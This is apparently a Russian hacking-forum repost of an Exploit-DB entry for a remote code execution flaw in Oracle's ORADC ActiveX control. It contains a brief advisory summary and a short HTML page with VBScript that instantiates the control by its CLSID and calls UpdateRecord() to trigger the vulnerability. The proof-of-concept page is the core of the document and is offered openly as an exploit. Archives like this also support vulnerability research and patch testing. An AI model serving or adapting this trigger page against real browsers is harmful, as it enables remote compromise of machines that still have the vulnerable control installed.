Exploit Oracle ORADC - ActiveX Control Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29449
Проверка EDB
  1. Пройдено
Автор
UMESH WANVE
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2007-01-12
Oracle ORADC - ActiveX Control Remote Code Execution
HTML:
source: https://www.securityfocus.com/bid/22026/info

Oracle ORADC ActiveX control is prone to a remote code-execution vulnerability.

Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.

<!--
// CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5}
// Info: ORADC Control
// ProgID: ORADC.ORADCCtrl.1
// InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx
--!>

<html>

<body>
<OBJECT id="test" WIDTH=445 HEIGHT=40
classid="clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5" >
</OBJECT>

<script language="vbscript">


test.UpdateRecord()


</script>

</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы